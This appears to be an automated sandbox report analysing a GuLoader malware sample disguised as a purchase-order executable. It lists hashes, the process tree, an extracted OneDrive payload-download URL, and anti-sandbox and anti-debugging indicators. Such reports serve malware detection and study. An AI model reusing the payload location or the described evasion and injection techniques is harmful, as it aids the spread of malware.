Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase Order PO20211027STK.exe

Overview

General Information

Sample Name:Purchase Order PO20211027STK.exe
Analysis ID:531732
MD5:2f2102ec5776497950e89e419515efee
SHA1:1d3dd4ed88af22c3de29c918b37db6f0b73c94c4
SHA256:7768da29cc4ef93cb4790f664e139d1d8c2972e22fe8840b6b86c50e15dba347
Tags:exeguloader
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Abnormal high CPU Usage
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Purchase Order PO20211027STK.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" MD5: 2F2102EC5776497950E89E419515EFEE)
    • SPORENE.exe (PID: 7152 cmdline: C:\Users\user\AppData\Local\Temp\SPORENE.exe MD5: 582A642DF36CDAC38982E4842F370B44)
      • CasPol.exe (PID: 6848 cmdline: C:\Users\user\AppData\Local\Temp\SPORENE.exe MD5: F866FC1C2E928779C7119353C3091F0C)
        • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000000.509732142.0000000001300000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 0000000A.00000000.509732142.0000000001300000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Purchase Order PO20211027STK.exeReversingLabs: Detection: 11%
      Machine Learning detection for sampleShow sources
      Source: Purchase Order PO20211027STK.exeJoe Sandbox ML: detected
      Source: Purchase Order PO20211027STK.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: Purchase Order PO20211027STK.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\SPORENE.pdb source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r
      Source: Purchase Order PO20211027STK.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.drString found in binary or memory: http://s.symcd.com06
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
      Source: unknownDNS traffic detected: queries for: onedrive.live.com
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE

      System Summary:

      barindex
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: Purchase Order PO20211027STK.exe
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: Purchase Order PO20211027STK.exeStatic file information: Suspicious name
      Source: Purchase Order PO20211027STK.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_0040755C0_2_0040755C
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_00406D850_2_00406D85
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeCode function: 2_2_004017242_2_00401724
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130C57E10_2_0130C57E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01313A7810_2_01313A78
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130CD7B10_2_0130CD7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01308F7F10_2_01308F7F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_013121A110_2_013121A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0131199010_2_01311990
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130B19810_2_0130B198
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0131363210_2_01313632
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130880F10_2_0130880F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130C57E NtAllocateVirtualMemory,10_2_0130C57E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01313445 NtProtectVirtualMemory,10_2_01313445
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess Stats: CPU usage > 98%
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSPORENE.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDNB10 vs Purchase Order PO20211027STK.exe
      Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSPORENE.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDNB10 vs Purchase Order PO20211027STK.exe
      Source: SPORENE.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Purchase Order PO20211027STK.exeReversingLabs: Detection: 11%
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeFile read: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeJump to behavior
      Source: Purchase Order PO20211027STK.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe"
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeProcess created: C:\Users\user\AppData\Local\Temp\SPORENE.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeProcess created: C:\Users\user\AppData\Local\Temp\SPORENE.exe C:\Users\user\AppData\Local\Temp\SPORENE.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\SPORENE.exeJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeFile created: C:\Users\user\AppData\Local\Temp\nsdBD47.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/1@2/0
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_01
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Purchase Order PO20211027STK.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\SPORENE.pdb source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 0000000A.00000000.509732142.0000000001300000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeCode function: 2_2_03F03DF2 push ebp; iretd 2_2_03F03E03
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeCode function: 2_2_03F018AA push es; retf 2_2_03F018AB
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeCode function: 2_2_03F00E2E push ebp; iretd 2_2_03F00E2F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130136D push es; retf 10_2_013015D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01301321 push es; retf 10_2_013015D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01305B1D push esp; ret 10_2_01305B83
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130130F push es; retf 10_2_013015D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130076A push ds; iretd 10_2_0130085B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130076D push ds; iretd 10_2_0130085B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130696E push eax; ret 10_2_0130696F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130494C push ds; iretd 10_2_0130494E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_013121A1 push es; retf 10_2_013015D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01301590 push es; retf 10_2_013015D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01303580 push edi; iretd 10_2_01303581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01313582 push es; retf 10_2_013015D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_013049F4 pushfd ; ret 10_2_01304A92
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_013075E0 push es; retf 10_2_013075F1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_013007C0 push ds; iretd 10_2_0130085B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_013033C9 push esp; ret 10_2_013033CA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01304A31 pushfd ; ret 10_2_01304A92
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01300822 push ds; iretd 10_2_0130085B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130AC24 push esi; retf 10_2_0130E74F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01303E12 push 0000000Ch; ret 10_2_01303E16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01300000 push es; retf 10_2_013015D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01305A7B push esp; ret 10_2_01305B83
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01305AB2 push esp; ret 10_2_01305B83
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130ACE8 push esi; retf 10_2_0130E74F
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeFile created: C:\Users\user\AppData\Local\Temp\SPORENE.exeJump to dropped file
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: SPORENE.exe, 00000002.00000002.630328200.0000000003F20000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
      Source: SPORENE.exe, 00000002.00000002.630328200.0000000003F20000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeSystem information queried: ModuleInformationJump to behavior
      Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: SPORENE.exe, 00000002.00000002.630328200.0000000003F20000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
      Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: SPORENE.exe, 00000002.00000002.630328200.0000000003F20000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0130FD16 mov eax, dword ptr fs:[00000030h]10_2_0130FD16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_013121A1 mov eax, dword ptr fs:[00000030h]10_2_013121A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01310ABF mov eax, dword ptr fs:[00000030h]10_2_01310ABF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01305BFC LdrInitializeThunk,10_2_01305BFC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01313A78 RtlAddVectoredExceptionHandler,10_2_01313A78

